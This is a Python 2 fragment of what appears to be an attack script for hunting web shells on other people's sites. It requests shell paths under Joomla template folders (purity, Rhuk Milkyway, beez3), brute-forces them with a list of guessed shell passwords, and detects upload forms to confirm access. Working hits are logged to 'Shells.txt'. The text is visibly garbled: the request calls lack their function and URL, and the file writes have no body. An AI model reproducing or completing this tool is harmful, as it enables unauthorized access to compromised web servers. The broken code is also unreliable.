if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[purity]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH9_J_content = requests.get(SH9_J,timeout=15).content
if ' type="file"' in SH9_J_content or ' type=\'file\'' in SH9_J_content or ' type= "file"' in SH9_J_content or ' type= \'file\'' in SH9_J_content or ' type = "file"' in SH9_J_content or ' type = \'file\'' in SH9_J_content or ' type ="file"' in SH9_J_content or ' type =\'file\'' in SH9_J_content or ' type=file' in SH9_J_content or ' type =file' in SH9_J_content or ' type= file' in SH9_J_content or ' type = file' in SH9_J_content or 'Upload</a> ]</li><li>[' in SH9_J_content or 'upload</a><li><a>Sym' in SH9_J_content :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH9_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Rhuk Milkyway]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH10_J_content = requests.get(SH10_J,timeout=15).content
if ' type="file"' in SH10_J_content or ' type=\'file\'' in SH10_J_content or ' type= "file"' in SH10_J_content or ' type= \'file\'' in SH10_J_content or ' type = "file"' in SH10_J_content or ' type = \'file\'' in SH10_J_content or ' type ="file"' in SH10_J_content or ' type =\'file\'' in SH10_J_content or ' type=file' in SH10_J_content or ' type =file' in SH10_J_content or ' type= file' in SH10_J_content or ' type = file' in SH10_J_content or 'Upload</a> ]</li><li>[' in SH10_J_content or 'upload</a><li><a>Sym' in SH10_J_content :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH10_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH11_J_content = requests.get(SH11_J,timeout=15).content
if ' type="file"' in SH11_J_content or ' type=\'file\'' in SH11_J_content or ' type= "file"' in SH11_J_content or ' type= \'file\'' in SH11_J_content or ' type = "file"' in SH11_J_content or ' type = \'file\'' in SH11_J_content or ' type ="file"' in SH11_J_content or ' type =\'file\'' in SH11_J_content or ' type=file' in SH11_J_content or ' type =file' in SH11_J_content or ' type= file' in SH11_J_content or ' type = file' in SH11_J_content or 'Upload</a> ]</li><li>[' in SH11_J_content or 'upload</a><li><a>Sym' in SH11_J_content :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH11_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[{}]'.format(fg,theme)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH12_J_content = requests.get(SH12_J,timeout=15).content
if ' type="file"' in SH12_J_content or ' type=\'file\'' in SH12_J_content or ' type= "file"' in SH12_J_content or ' type= \'file\'' in SH12_J_content or ' type = "file"' in SH12_J_content or ' type = \'file\'' in SH12_J_content or ' type ="file"' in SH12_J_content or ' type =\'file\'' in SH12_J_content or ' type=file' in SH12_J_content or ' type =file' in SH12_J_content or ' type= file' in SH12_J_content or ' type = file' in SH12_J_content or 'Upload</a> ]</li><li>[' in SH12_J_content or 'upload</a><li><a>Sym' in SH12_J_content :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH12_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[beez3]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
